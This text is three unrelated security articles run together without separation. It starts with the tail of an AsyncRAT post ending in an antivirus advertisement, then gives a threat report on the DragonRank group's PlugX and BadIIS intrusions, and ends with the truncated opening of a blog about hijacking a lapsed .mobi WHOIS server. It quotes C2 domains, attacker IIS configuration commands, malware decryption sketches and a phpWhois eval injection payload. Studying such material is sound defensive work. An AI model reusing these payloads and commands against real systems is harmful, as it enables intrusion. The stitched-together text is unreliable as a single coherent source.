We can see the decrypt method being called on each config parameter. In the above image, we have documented the AsyncRAT C2 domain it is using: orostros.mywire.org.
It turns out that this is a dynamic DNS service that the malware author is abusing to their advantage.
In conclusion, the rise of AsyncRAT and its distribution via masquerading as cracked software highlights the evolving tactics, techniques, and procedures (TTPs) employed by cybercriminals. By exploiting the lure of free software, these attackers are gaining unauthorized access to countless systems, jeopardizing sensitive information and digital assets.
Understanding these TTPs is crucial for anyone looking to protect themselves from such threats. However, awareness alone isn’t enough. To truly safeguard your digital presence, it’s essential to use reliable security solutions. McAfee antivirus software offers comprehensive protection against various threats, including malware like AsyncRAT. With real-time scanning, advanced threat detection, and continuous updates, McAfee ensures your devices remain secure from the latest cyber threats.
Don’t leave your digital assets vulnerable. Equip yourself with the right tools and stay one step ahead of cybercriminals. Your security is in your hands—make it a priority today.
Cisco Talos is disclosing a new threat called “DragonRank” that primarily targets countries in Asia and a few in Europe, operating PlugX and BadIIS for search engine optimization (SEO) rank manipulation.
DragonRank exploits targets’ web application services to deploy a web shell and utilizes it to collect system information and launch malware such as PlugX and BadIIS, running various credential-harvesting utilities.
Their PlugX not only uses familiar sideloading techniques but also abuses the Windows Structured Exception Handling (SEH) mechanism to ensure that the legitimate file can load PlugX without raising suspicion.
We have confirmed that more than 35 IIS servers were compromised and had the BadIIS malware deployed on them in this campaign, across a diverse array of geographic regions including Thailand, India, Korea, Belgium, the Netherlands and China.
Talos also discovered DragonRank’s commercial website, business model and instant message accounts. We used this information to assess with medium to high confidence the DragonRank hacking group is operated by a Simplified Chinese-speaking actor.
Victimology: Countries, verticals and what is happening
Talos has recently uncovered a cluster of activity we’re calling “DragonRank” distributed across a diverse array of geographic regions, including Thailand, India, Korea, Belgium, Netherlands and China. They have cast a wide net in terms of industries, encompassing sectors such as jewelry, media, research services, healthcare, video and television production, manufacturing, transportation, religious and spiritual organizations, IT services, international affairs, agriculture, sports, and even niche markets like feng shui. This broad spectrum of targets indicates a wide-reaching and non-targeted approach to their operations.
These activities employ tools and tactics, techniques, and procedures (TTPs) typically linked to Simplified Chinese-speaking hacking groups. The hacking group’s primary goal is to compromise Windows Internet Information Services (IIS) servers hosting corporate websites, with the intention of implanting the BadIIS malware. BadIIS is a malware used to manipulate search engine crawlers and disrupt the SEO of the affected sites. With those compromised IIS servers, DragonRank can distribute the scam website to unsuspecting users.
The threat actor engages in SEO manipulation by altering or exploiting search engine algorithms to improve a website's ranking in search results. They conduct these attacks to drive traffic to malicious sites, increase the visibility of fraudulent content, or disrupt competitors by artificially inflating or deflating rankings. These attacks can harm a company's online presence, lead to financial losses, and damage its reputation by associating the brand with deceptive or harmful practices.
The actor takes the compromised websites and promotes them, effectively turning these sites into platforms for scam operations. The scam websites we observed in this campaign utilize keywords related to porn and sex, and the configuration data of the keywords from the command and control (C2) servers have been translated to multiple languages. Talos has confirmed more than 35 IIS servers had been compromised and acted as a conduit for this attack. The following example pictures show the configured data from C2 server and infected scam websites we observed from search engine results.
Who they are
The findings revealed that DragonRank is actively engaging in black hat SEO practices to promote their business online, thereby boosting their clients' internet visibility by unethical means. However, we discovered that the DragonRank hacking group operates differently from traditional black hat SEO cybercrime groups. These groups usually compromise as many website servers as possible to manipulate search engine traffic, but DragonRank emphasizes lateral movement and privilege escalation. Their objective is to infiltrate additional servers within the target's network and maintain control over them. We assess that they are relatively new to the black hat SEO industry, and they functioned more as a hacking group specializing in targeted attacks or penetration testing in the past.
Based on DragonRank's objectives and the C2 servers extracted from their PlugX malware, we utilized relevant keywords to conduct a search engine investigation. For instance, searching "tttseo.com" on Google showed numerous instances of DragonRank’s advertisements, which had been inserted across various legitimate websites. The content of these ads consistently centered on methods for black hat SEO services. By altering our IP address to appear as if we were accessing the internet from another country (we used Japan as an example), we conducted keyword searches which confirmed that DragonRank has disseminated their targeted keywords globally. Additionally, it has come to our attention that the actor is offering services for bulk posting on social media platforms.
We also uncovered DragonRank's commercial website, which provides Chinese and English versions of their business model. According to their introduction, their business includes white hat SEO and black hat SEO advertising channels, including cross-site ranking, single-site ranking, parasite ranking, extrapolation ranking, and search result dominance. DragonRank’s activity also covers over 200 countries and regions worldwide and can support large amounts of industry-wide advertising.
Talos also observed DragonRank sharing their contact information on Telegram and the QQ instant message application, which allows users to contact them and conduct underground business trades. This allowed us to collect information and uncover several business models and pieces of cybercrime evidence from the attacker's side. First, the account name is “天天推工作室” and the icon is “校长工作室”; although the names differ between the two, both translate to a “studio”, which suggests they likely have the same motivations as any other traditional business. They also included a cautionary note in their account biography stating to "make sure of the transaction confirmation address, as we will not be held accountable for any incorrect payments!"
This disclaimer gives us high confidence that DragonRank conducts their cybercriminal activities by receiving payments from customers. These adversaries also offer seemingly quality customer service, tailoring promotional plans to best fit their clients' needs. Customers can submit the keywords and websites they wish to promote, and DragonRank develops a strategy suited to these specifications. The group also specializes in targeting promotions to specific countries and languages, ensuring a customized and comprehensive approach to online marketing.
Although we are not entirely certain of the original attacker's location, given that the Telegram phone number is from Thailand, Talos assesses with medium to high confidence that the DragonRank hacking group is operated by Simplified Chinese-speaking actors. The creators of the website stated that China is the “mainland,” which further bolsters our confidence assessment. This actor also operates PlugX, a well-known backdoor used by multiple Chinese threat actors. Perhaps most importantly, the group uses Simplified Chinese on its promoted website, and their customer service uses Simplified Chinese to speak with customers.
The attack chain of this campaign
In this campaign, the initial entry point leveraged by the DragonRank hacking group is to take advantage of vulnerabilities in web application services, such as phpMyAdmin, WordPress, or similar web applications. Once DragonRank obtains the ability to execute remote code or upload files on the targeted site, they proceed to deploy a web shell. This grants them control over the compromised server, marking their initial foothold. The following screenshot and detected locations show the web shell used in this campaign, which is identified as the open-source ASPXspy web shell.
C:\phpMyAdmin\shell.aspx
C:\AWStats\wwwroot\shell.aspx
After dropping the web shell, the group was seen utilizing it to collect system information and launch malware such as PlugX and BadIIS, as well as to run various credential-harvesting utilities that include Mimikatz, PrintNotifyPotato, BadPotato and GodPotato. The commands used by the attacker to gather system details and dump credentials are provided below.
DragonRank also breaches additional Windows IIS servers in the target’s network, either through the deployment of web shells or by exploiting remote desktop logins using acquired credentials. After accessing the other Windows IIS servers, the adversaries employ a web shell or Remote Desktop Protocol (RDP) to install PlugX, BadIIS, credential-dumping tools, and a user cloning utility, with the aim of maintaining a low profile and ensuring persistence within the network. We also noticed on one of the compromised servers that DragonRank used a utility to clone an administrator's permissions to a guest account, elevating the guest account to administrator privileges within the compromised system, and then executed the credential-dumping tool. The full attack chain diagram is shown below.
Five months following the initial breach, DragonRank re-engaged with one of the previously compromised IIS servers through a previously deployed web shell to verify its operational status and ensure the server still possessed the permissions required for their activities. The verification process involved several steps: downloading a web shell onto the system, retrieving the host name and acquired credentials, adding a hidden administrator account denoted as “admin$”, disabling and re-enabling RDP to facilitate remote control, and covering their tracks by deleting the “admin$” account at the end. The commands are shown below.
PlugX serves as the primary backdoor used by this hacking group in this campaign. They utilized the DLL sideloading technique, exploiting vulnerable legitimate binaries to initiate the PlugX loader, which is consistent with the method described in this report. We have outlined the execution flow of the PlugX malware based on our telemetry data and the payload that was discovered on VirusTotal.
Although this PlugX relies on the familiar sideloading technique seen with previous PlugX loaders, there are still a few significant modifications to the PlugX loader component in this campaign. The first concerns the loader's use of the "TopLevelExceptionFilter" function, an SEH mechanism for managing top-level exceptions, to ensure the legitimate file can effectively load the PlugX loader without raising suspicion. By integrating with SEH, PlugX can intercept exceptions that occur during program execution, which can be used as a form of error handling or to obfuscate malicious activities. Leveraging Windows' built-in exception handling mechanism to bypass security measures makes it more difficult for antivirus products and other security tools to detect malicious behavior. The use of SEH demonstrates the sophistication of the malware and helps PlugX remain persistent and stealthy within a compromised system.
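The Windows primitive behind this trick is SetUnhandledExceptionFilter, which installs a callback that runs when no other handler claims an exception. The Windows-only Python sketch below simply registers a benign filter via ctypes to show the mechanism; it is not the PlugX loader's code.

import ctypes
from ctypes import wintypes

kernel32 = ctypes.WinDLL("kernel32", use_last_error=True)
EXCEPTION_CONTINUE_SEARCH = 0

# LONG WINAPI filter(EXCEPTION_POINTERS *info)
FILTER_TYPE = ctypes.WINFUNCTYPE(wintypes.LONG, ctypes.c_void_p)

@FILTER_TYPE
def top_level_filter(exception_pointers):
    # A loader abusing this mechanism would transfer control to its payload here;
    # this benign version just logs and lets normal crash handling continue.
    print("top-level exception filter invoked")
    return EXCEPTION_CONTINUE_SEARCH

# The filter fires only for genuinely unhandled SEH exceptions (e.g. access
# violations), not for ordinary Python exceptions.
kernel32.SetUnhandledExceptionFilter(top_level_filter)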
When the PlugX loader is successfully sideloaded by the legitimate binary, it searches for the payload in three distinct locations. The initial search area is the directory where the loader itself resides. The second location is within the system registry under "HKEY_LOCAL_MACHINE\SOFTWARE\bINARy," specifically looking for the value "Acrobat.dxe." The third location is a similar registry path under "HKEY_CURRENT_USER\SOFTWARE\bINARy," again checking for the value "Acrobat.dxe." Once the payload is found in any of these locations, the PlugX loader will load it, decrypt it using the XOR algorithm with the key "0xD1," and inject it into a virtually allocated memory block. The PlugX payload then connects to the C2 server and executes in memory to stay under the radar.
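The single-byte XOR step described above is trivial to reproduce. The sketch below decrypts a blob dumped from either registry location or from disk, assuming only the 0xD1 key named above; the file name is a placeholder.

def xor_decrypt(data: bytes, key: int = 0xD1) -> bytes:
    # Single-byte XOR, as used by this PlugX loader to decrypt its payload.
    return bytes(b ^ key for b in data)

# Hypothetical usage: "Acrobat.dxe" dumped from the registry or from disk.
with open("Acrobat.dxe", "rb") as f:
    payload = xor_decrypt(f.read())
print(payload[:16].hex())  # quick sanity check of the decrypted header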
Further, we conducted a pivot analysis of this latest loader using VirusTotal and other malware cloud repositories. During this research and analysis, we discovered that a similar PlugX loader, with the same system registry path, values and XOR algorithm with the key "0xD1," had been uploaded to VirusTotal. We used this instance of the PlugX loader found on VirusTotal to retrieve a few original archived files and their download sites. Despite differences in the archived files' initial upload sources and the countries involved, the PlugX loader and its associated payload proved to be identical, with their hashes matching precisely.
PlugX is a well-known remote access tool (RAT), equipped with modular plugins and property configurations, that has been deployed by various Chinese-speaking cyber threat actors for more than ten years. The PlugX configuration in this campaign contains all the necessary values and information to properly run the executable. We extracted all the configuration field and value information from the pivot samples on VirusTotal. Below are the fields contained in the PlugX configuration.
C2 Address: mail.tttseo[.]com:53
Persistence Type: Service + Run Key
Install Dir: %ALLUSERSPROFILE%\Adobe\Player\
Service Name: Microsoft Office Document Update Utility
Service Disp: Microsoft Office Document Update Utility
Service Desc: Microsoft Office Document Update Utility
We also discovered the same PlugX loader and payload in a file named "ddos.zip," which is disguised as a tool for managing DDoS attacks. However, all the files within this compressed archive are different variants of the PlugX loader. This behavior supports our assessment that this hacking group might be new to the cybercrime industry, as they show little concern for maintaining a reputable facade. Additionally, the archive includes an application manual designed to lure users into inadvertently executing the malware under the guise of operating a DDoS tool. The file consists of two subfolders, one masquerading as a server-side control interface and the other as a client-side installation utility. Both folders contain different versions of the PlugX loader malware but the same PlugX payload. The first variant of the PlugX loader is identical to the one examined in this case, while the other utilizes a digitally signed driver to facilitate the execution of the PlugX payload. The operational details of this second, digitally signed driver variant are in line with the descriptions provided in this analysis. Additionally, the application's manual and the name of the folder are in Simplified Chinese, leading us to conclude that this decoy file is targeted at regions where Simplified Chinese is spoken.
BadIIS
To manipulate search engine crawlers and hyperlink jumps, the threat actor deployed previously seen malware, BadIIS, which was previously discussed at Black Hat USA 2021. There is medium confidence that the BadIIS observed in this campaign is associated with the entity referred to as Group 9 in the Black Hat presentation. The version of BadIIS we've detected shares similar traits with the one mentioned at the conference, including the configuration as an IIS proxy and capabilities for SEO fraud.
Group 9's IIS proxy is specifically used to relay C&C communications between infected hosts and their C&C server. This malware family can also perform SEO fraud by altering HTTP responses from the compromised IIS servers to search engine crawlers. This allows attackers to manipulate search engine rankings, artificially inflating the SEO of specific third-party websites by exploiting the credibility of the sites hosted on the breached web server. While the behavior and tactics of the BadIIS malware are largely consistent, we have noted a few distinctions that set the current variant apart, which we have identified and list below.
Crawlers pattern: Group 9 targets Chinese search engines (e.g., sogou, baidu, 360), while DragonRank targets well-known search engines (e.g., google, yahoo, bingbot).
We also analyzed other available samples that share an execution sequence with this campaign, have filenames identical to the malicious activity we observed, and are possibly related to attacks we observed in another campaign. We have uncovered several important discoveries through our research, and these will be detailed sequentially in this section.
Our initial observation reveals that the DragonRank hacking group tends to install the BadIIS malware in certain file locations. For instance, they attempt to place BadIIS within directories named "Kaspersky SDK," likely as a tactic to evade detection by security software. The file paths we observed are as follows:
C:/ProgramData/Kaspersky SDK/IISMODEx86.dll
C:/ProgramData/Kaspersky SDK/IISMODEx64.dll
C:/ProgramData/IISMODEx64.dll
C:/ProgramData/IISMODEx86.dll
Additionally, Talos has observed that the BadIIS malware samples contain Program Database (PDB) strings as well as timestamps indicating when they were compiled. The BadIIS malware variants were compiled between April and August 2023. The PDB strings for these samples are listed below:
Based on our analysis of these matching samples and telemetry from our secure agent, the execution sequence has two parts:
Execute “1.bat”, a batch file, to install BadIIS
The discovery of the "1.bat" script file guided us to a blog post that revealed the source code for the BadIIS malware. This post not only shared the source code and objectives of BadIIS but also included a well-organized batch script, enabling users to easily install the BadIIS on IIS servers. The main purpose of this batch script is to configure the IIS module to install the malicious BadIIS payload. It leverages the appcmd.exe utility to modify the IIS configuration and copy BadIIS module files within the "%windir%\Microsoft.NET\Framework64" directory. Upon completion of these modifications, it proceeds to restart the IIS services to enact the changes.
Talos observed that the DragonRank hacking group has added two additional commands to the install script file “1.bat”, shown below. Our assessment suggests that the proxy functionality of BadIIS may no longer have the capability to compress the output produced by scripts, executables, or static files such as HTML, CSS, JavaScript, and images. To successfully relay communication between the compromised server and the C&C servers, the threat actor disables the IIS dynamic and static compression functions.
C:\Windows\system32\inetsrv\appcmd.exe set config /section:urlCompression /doStaticCompression:false
C:\Windows\system32\inetsrv\appcmd.exe set config /section:urlCompression /doDynamicCompression:false
On one of the compromised servers in this campaign, we also observed the DragonRank hacking group use the following command to modify the file attributes of the BadIIS malware in an attempt to conceal the file and make it more difficult to detect or alter.
Upon analyzing the signature of the malware, it shares similarities with the activities described in the Black Hat USA 2021 talk on "Group 9." The "Group 9" malware is designed to carry out proxy and SEO fraud, consistent with the actions detailed in the report. However, the SEO fraud and proxy functions in this campaign differ slightly from Group 9’s BadIIS variant. The SEO fraud initialization still catches incoming HTTP requests whose User-Agent header matches a search engine crawler, but the crawler pattern is not identical to the one in the report; below is the BadIIS search engine crawler bot pattern that we observed in this campaign:
The proxy feature of the BadIIS malware is configured to permit access to certain URL paths or to restrict specific file types based on their file extensions. Once a request matches the BadIIS restrictions, BadIIS will forward the request to the C&C server using the “/zz1.php” URL path.
If a request fails to match the designated URL paths or includes a disallowed file extension, the proxy tool redirects the traffic to the C&C server with a different path, “/xx1.php”, sending the incoming request's host name, URL path and domain name to the C&C server, as illustrated below. Additionally, the URI parameters in the BadIIS malware are exactly the same as those in the blog post's source code, which provides further evidence that the BadIIS we found was modified from there.
We also identified that the BadIIS malware pretends to be a Google search engine crawler in its User-Agent when it relays the connection to the C&C server. This could help the threat actor avoid network security product alerts and easily bypass some websites' weaker security measures.
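To summarise the request handling described in the last few paragraphs, the sketch below models only the classification logic: whether an incoming request looks like a search engine crawler (the SEO-fraud trigger), and which C&C path the proxy feature would use. The crawler pattern, allowed paths and blocked extensions are illustrative placeholders, not the actual values observed in the samples.

import re
from urllib.parse import urlsplit

# Placeholders only; the real pattern and restrictions are documented above.
CRAWLER_UA = re.compile(r"googlebot|bingbot|yahoo", re.IGNORECASE)
ALLOWED_PATH_PREFIXES = ("/news/", "/search/")
BLOCKED_EXTENSIONS = (".css", ".js", ".png", ".jpg")

def is_crawler(user_agent: str) -> bool:
    # SEO-fraud trigger: does the User-Agent look like a search engine bot?
    return bool(CRAWLER_UA.search(user_agent or ""))

def relay_path(url: str) -> str:
    # Proxy trigger: pick the C&C path a BadIIS-style module would use.
    path = urlsplit(url).path
    if path.startswith(ALLOWED_PATH_PREFIXES) and not path.endswith(BLOCKED_EXTENSIONS):
        return "/zz1.php"   # request matches the restrictions
    return "/xx1.php"       # otherwise, report host name / path / domain here

print(is_crawler("Mozilla/5.0 (compatible; Googlebot/2.1)"))
print(relay_path("http://victim.example/news/index.html"))
print(relay_path("http://victim.example/static/app.js"))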
We have confirmed that the BadIIS malware affects neither the compromised server nor the server’s users. However, it poses a threat to users of third-party websites by acting as a conduit for phishing attacks. BadIIS leverages an Internet Server Application Programming Interface (ISAPI) DLL to take control of all HTTP requests sent to the hosted websites and to modify the server's HTTP responses strategically. The malware engages in SEO deception on the infected IIS servers to boost the visibility of a third-party fraudulent website, specifically targeting and influencing the behavior of certain search engine crawlers as detailed in the blog post. Below is the network request flow of the BadIIS operating mechanism in this campaign.
Assembly web shell
We performed a pivot analysis of the C&C IP associated with PrintNotifyPotato using VirusTotal and other malware cloud repositories. Through this analysis, we discovered four distinct versions of ASP.NET-compiled DLLs that embedded Metasploit and tried to connect to the same C&C we found. These DLL files typically appear when ASP.NET compiles .aspx files into assemblies, a process that occurs upon the first access to the .aspx file, with ASP.NET saving the resulting assemblies in a temporary directory.
The DLL web shell has several functions embedded: a Metasploit reverse shell, the Godzilla web shell, and the ASPXSpy web shell. Below, we list the web shell file paths and their corresponding functions.
Although the ASPXSpy web shell is open source on GitHub, the specific version of ASPXSpy we identified in the compiled DLLs matches exactly the one used in this campaign.
ASPXSpy web shell in this campaign (left) and web shell in compiled DLLs (right).
Coverage
Cisco Secure Endpoint (formerly AMP for Endpoints) is ideally suited to prevent the execution of the malware detailed in this post. Try Secure Endpoint for free here.
Cisco Secure Web Appliance web scanning prevents access to malicious websites and detects malware used in these attacks.
Cisco Secure Email (formerly Cisco Email Security) can block malicious emails sent by threat actors as part of their campaign. You can try Secure Email for free here.
Cisco Secure Malware Analytics (Threat Grid) identifies malicious binaries and builds protection into all Cisco Secure products.
Umbrella, Cisco's secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs and URLs, whether users are on or off the corporate network. Sign up for a free trial of Umbrella here.
Cisco Secure Web Appliance (formerly Web Security Appliance) automatically blocks potentially dangerous sites and tests suspicious sites before users access them.
Additional protections with context to your specific environment and threat data are available from the Firewall Management Center.
Cisco Duo provides multi-factor authentication for users to ensure only those authorized are accessing your network.
Open-source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org. The Snort SIDs for this threat are 63953 and 63954.
ClamAV detections are also available for this threat:
Win.Trojan.Explosive-ASP-6510859-0
Asp.Trojan.Webshell-6993264-0
Win.Tool.GodPotato-10019688-1
Win.Malware.Mimikatz-10034728-0
Win.Tool.PrintNotifyPotato-10034729-0
Win.Tool.UserClone-10034730-0
Win.Malware.BadIIS-10034755-0
Win.Trojan.PlugX_Payload-10034756-0
Win.Trojan.PlugXLoader-10034757-0
Win.Trojan.PlugXKernelDriver-10034758-0
Win.Trojan.Mimikatz-6466236-2
Win.Tool.BadPotato-9819486-2
Indicators of compromise
Indicators of Compromise associated with this threat can be found here.
Welcome back to another watchTowr Labs blog. Brace yourselves, this is one of our most astounding discoveries.
Summary
What started out as a bit of fun between colleagues while avoiding the Vegas heat and $20 bottles of water in our Black Hat hotel rooms - has now seemingly become a major incident.
We recently performed research that started off "well-intentioned" (or as well-intentioned as we ever are) - to make vulnerabilities in WHOIS clients and how they parse responses from WHOIS servers exploitable in the real world (i.e. without needing to MITM etc).
As part of our research, we discovered that a few years ago the WHOIS server for the .MOBI TLD migrated from whois.dotmobiregistry.net to whois.nic.mobi – and the dotmobiregistry.net domain had been left to expire seemingly in December 2023.
Putting thoughts aside, and actions first, we punched credit card details as quickly as possible into our domain registrar to acquire dotmobiregistry.net - representing much better value than the similarly priced bottle of water that sat next to us.
Our view was that as a legacy WHOIS server domain, it was likely only used by old WHOIS tools (such as phpWHOIS, which conveniently has a Remote Code Execution (RCE) CVE from 2015 for the parsing of WHOIS server responses – thus fitting our aim quite nicely).
Throwing caution to the wind and following what we internally affectionately refer to as our 'ill-advised sense of adventure' - on Friday 30th August 2024 we deployed a WHOIS server behind the whois.dotmobiregistry.net hostname, just to see if anything would actually speak to it actively.
The results since then have been fairly stunning - we have identified 135,000+ unique systems speaking to us, and as of 4th September 2024 we had 2.5 million queries. A brief analysis of the results showed queries from (but certainly not limited to):
Various mail servers for .GOV and .MIL entities using this WHOIS server to presumably query for domains they are receiving email from,
Various cyber security tools and companies still using this WHOIS server as authoritative (VirusTotal, URLSCAN, Group-IB as examples)
However, significant concern appeared on 1st September 2024 when we realised that numerous Certificate Authorities responsible for issuing TLS/SSL certificates for domains like 'google.mobi' and 'microsoft.mobi', via the 'Domain Email Validation' mechanism for verifying ownership of a domain, were using our WHOIS server to determine the owners of a domain and where verification details should be sent.
We PoC'd this with GlobalSign and were able to demonstrate that for 'microsoft.mobi', GlobalSign would parse responses provided by our WHOIS server and present '[email protected]' as an authoritative email address.
Effectively, we had inadvertently undermined the CA process for the entire .mobi TLD.
As is common knowledge, this is an incredibly important process that underscores the security and integrity of communications that a significant amount of the Internet relies upon. This process has been targeted numerous times before by well-resourced nation-states:
While this has been interesting to document and research, we are a little exasperated. Something-something-hopefully-an-LLM-will-solve-all-of-these-problems-something-something.
As always, we remind everyone - if we could do this, anyone can.
Onto the full story...
Setting The Scene
We're sure you’re familiar with the old adage, ‘it never rains but it pours’. That was definitely the case here, where we set out with the intention of just getting some RCE’s to fling around, and ended up watching the foundation of secure Internet communication crumble before our eyes.
Before we get ahead of ourselves, though, let’s start at the beginning, in which we decided to take a quick look at a WHOIS client. The protocol being some 50+ years old, we expected WHOIS clients to be constructed with the same brand of string as an enterprise-grade SSL VPN appliance, and so we took a naive shot and served up some A’s.
This, at first glance, looks like an easily-exploitable crash. We were keen to find more bugs, and eagerly started examining some other client implementations - but we were soon interrupted by some vocal naysayers.
They were quick to remind us that, to get to this state in our lab environment, we’d impersonated a WHOIS server, redirecting traffic from the usual server to our test server via iptables.
How realistic was this attack scenario, the naysayers asked?
We tried to silence the naysayers and convince them our attack was plausible - we could find a registrar that allows us to set a Referral WHOIS value, or buy an IP range and control the range ourselves - but they suggested we spend more time doing, and less time playing academia.
The reality was that in order for an attacker to carry out an attack against a WHOIS client, they’d need one of the following:
A Man-In-The-Middle (MiTM) attack, which requires the ability to hijack WHOIS traffic at the network layer - out of reach for all but the most advanced of APTs,
Access to the WHOIS servers themselves, which is plausible but unlikely, or
A WHOIS referral to a server they control.
These are effectively the preconditions of a nation-state or someone who is very comfortable compromising global TLD WHOIS servers in pursuit of exploiting clients.
You would, at this point, be forgiven for thinking that this class of attack - controlling WHOIS server responses to exploit parsing implementations within WHOIS clients - isn’t a tangible threat in the real world.
We were left unsatisfied. We had located some shoddy code, but declaring it out of reach sounded like something you might bill a day rate for.
Perhaps there was another avenue for attack?
Collateral Damage In Pursuit Of RCE
The key to turning this theoretical RCE into a tangible reality is rooted in the tangled mess of the WHOIS system.
One of the biggest ‘kludges’ in the WHOIS system is the means of locating the authoritative WHOIS server for a given TLD in the first place.
Each TLD (the bit at the end of the domain), you see, has a separate WHOIS server, and there’s no real standard to locating them - the only ‘real’ method being examining a textual list published by IANA. This list denotes the hostname of a server for each TLD, which is where WHOIS queries should be directed.
As you can imagine, maintainers of WHOIS tooling are reluctant to scrape such a textual list at runtime, and so it has become the norm to simply hardcode server addresses, populating them at development time by referring to IANA’s list manually. Since the WHOIS server addresses change so infrequently, this is usually an acceptable solution.
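For context, this is all a WHOIS lookup amounts to on the wire: open TCP port 43 on whichever server your tooling has hardcoded, send the query followed by CRLF, and read text until the server closes the connection. A minimal Python sketch:

import socket

def whois_query(server: str, query: str, timeout: float = 10.0) -> str:
    # Minimal WHOIS client: TCP port 43, query + CRLF, read until EOF.
    with socket.create_connection((server, 43), timeout=timeout) as sock:
        sock.sendall(query.encode("ascii", "ignore") + b"\r\n")
        chunks = []
        while True:
            data = sock.recv(4096)
            if not data:
                break
            chunks.append(data)
    return b"".join(chunks).decode("utf-8", "replace")

# Hardcoding a server per TLD is exactly the habit described above;
# whois.nic.mobi is the current authoritative server for .mobi.
print(whois_query("whois.nic.mobi", "example.mobi")[:500])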
However, it falls down in an ungraceful manner when server addresses change. With a little bit of legwork, we found that the WHOIS server for a particular TLD - .mobi - had been changed some years ago from the old domain whois.dotmobiregistry.net to a new server, at whois.nic.mobi.
Of course though, because the Internet is joined together by literal string and hopes/wishes at this stage, somebody had neglected to renew the old domain at dotmobiregistry.net meaning it was up for grabs by anyone with $20 and an ill-advised sense of exploration.
We registered the domain, working on the theory that, while most client tooling would be updated to use whois.nic.mobi, most of the Internet population is still surprised when their 2011 SAP deployment gets popped, and thus WHOIS applications in production had a fairly decent chance of still referencing whois.dotmobiregistry.net.
Of course, this being the Internet, we got a little more than we bargained for.
So What? It's Old
We soon realized the threat model for this attack had just changed.
Now that we control a WHOIS server, we were in the position to ‘respond’ to traffic sent by anyone who hadn’t updated their client to use the new address (auto updates are bad, turn them off).
No longer do we require a Man-In-The-Middle attack, or some exotic WHOIS referral, to exploit a WHOIS client vulnerability - all we need to do is wait for queries to come in, and theoretically respond with whatever we want.
The pre-requisites for real-world exploitation now sat within what we deemed ‘rough reality’.
Things were beginning to escalate.
We had set out to find some simple bugs in WHOIS client tooling, file for some CVEs, get them fixed.. but then we realised that once again we’d probably chewed off more than we intended and things were about to become worse - much worse.
Never Update, Auto-Updates And Change Are Bad
Unfortunately, there is a lot of Internet infrastructure which depends on the antiquated WHOIS protocol.
Starting off slow, we’re now in a position to attack the many websites that run a WHOIS client and echo the results back to the user, injecting XSS or PHP eval payloads. Ethical (and legal) concerns prevent us from doing so, however - and we did not spend $20 to get an XSS.
Of course, our original goal was to find and exploit some 0day in WHOIS clients, or some other system that embeds a WHOIS client (such as a spam filter), similar to the trivial memory corruption we found earlier.
Our biggest hurdle here - as alluded to above - was the simplicity of the WHOIS protocol itself, which is a simple text-based TCP data stream. With so little complexity, there seemed very little room for developers to make errors.
Ha.
Prior Art
To fully understand and look to leverage our new capability and adjusted threat model, we decided to examine the area’s ‘prior art’ in exploitation, looking at historic attacks on WHOIS clients.
We were somewhat surprised that a search for relevant CVE data yielded relatively few results, which we attributed to the area being under-researched - the search returned 26 CVE records.
Once we discount the irrelevant results, we are left with only three bugs that are triggered by malformed WHOIS responses.
This small number - three bugs since 1999 - makes it obvious to us that very little research has been done - likely due to the perception that any real-world exploitation comes with difficult prerequisites, such as control of a TLD WHOIS server.
But, there have been some interesting cases - just to give you a taste of where this is going.
phpWHOIS (CVE-2015-5243)
The first bug that our retrospective found was CVE-2015-5243. This is a monster of a bug, in which the prolific phpWhois library simply executes data obtained from the WHOIS server via the PHP ‘eval’ function, allowing instant RCE from any malicious WHOIS server.
The important item is the juicy eval statement in the middle of the snippet, which is fed data returned from the WHOIS server.
While it attempts to escape this data before evaluating it, it does so imperfectly, only replacing double quotes with an escaped form. Because of this, we can sneak in our own PHP code, which is then executed for us.
Netitude’s blogpost lays out all the details, and even provides us with exploitation code - ";phpinfo();// is enough to spawn a phpinfo page.
We tried this out on an application that uses phpWhois, purely to demonstrate, and it worked swimmingly:
Clearly this is a powerful bug - the best part being that phpWhois hardcodes our newly found whois.dotmobiregistry.net in vulnerable versions (it's old, but at a cursory glance no-one appears to have ever updated phpWhois).
What other historic artefacts could we find, though?
Fail2Ban (CVE-2021-32749)
As we continued to examine historic client-side bugs, we came across CVE-2021-32749. This one is again a pretty nasty bug, this time in the ever-popular fail2ban package. It’s a command injection vulnerability, a vulnerability class keenly sought by attackers due to its power and ease of exploitation.
As you may know, if you have administered a fail2ban server, the purpose of fail2ban is to monitor failed login attempts, and prevent bruteforce or password-guessing attacks by blocking hosts which repeatedly fail to log in.
Being the polished package it is, it also includes the ability to email an administrator when an IP address is banned, and - very helpfully - when it does so, it will enrich the email with information about who owns the banned IP address.
This information is gleaned from - yeah, you guessed it! - our friend WHOIS.
Unfortunately, for some time, the output of the WHOIS client wasn’t correctly sanitized before being passed to the mail tool, and so a command injection bug was possible.
Fortunately - or unfortunately, if you’re an attacker - because fail2ban runs a WHOIS query on the IP address rather than, for example, a domain name specified in the PTR record of the blocked host's IP address, this attack is still not within reach of our newly found capability.
For those that control a WHOIS server that is queried for IP addresses, though, exploitation is simple - simply attempt to unsuccessfully authenticate to a server via SSH a few times to trigger a ban, and once fail2ban queries the WHOIS server for information on your IP address - serve a payload wrapped in backticks.
Reality check
So, the burning question on our minds - can we actually exploit these bugs, right now?
Well, at this stage, our view was fairly pessimistic in terms of achieving real-world impact. We saw the following pre-requisites:
The WHOIS client must be querying an old authoritative .MOBI WHOIS server and thus, by definition, has not been working for quite a while
To achieve client-side code execution (i.e. compromise) via a WHOIS client vuln - the only public option available to us was disclosed in 2015 and appears to have been rectified in 2018 - likely due to the perceived lack of real-world exploitation mechanisms.
Meh. Our gut feeling remained that most of the Internet and those in the sane world would logically be querying the new .mobi authoritative WHOIS server whois.nic.mobi, rather than the decommissioned dotmobiregistry.net (which we now controlled).
“Surely no large organisations would still reference the old domain”, we thought to ourselves.
Kill WHOIS With Fire
Without skipping a beat and really not considering the consequences, we set up a WHOIS server beneath our new domain at whois.dotmobiregistry.net, and logged incoming requests. We specifically focused on two things:
Source IPs (so we can perhaps begin to work out who exactly was querying an outdated server), and,
The queried domain (because again, this may give off some clues).
We threw together the lglass server to respond to WHOIS requests that found their way to our WHOIS server, and returned:
ASCII art (we were relatively restrained here, but it was a priority)
Fake WHOIS details indicating watchTowr as the owner for every queried entity.
As this was our private server, we included a request for queries to cease (after all, they were unauthorised).
A quick test directly to our new WHOIS server showed that all was working as expected, with the following response provided for a query about google.mobi:
Nice.
Uh…..
Well, it’s 2024 - absolutely no one has the ability to exercise patience, including ourselves.
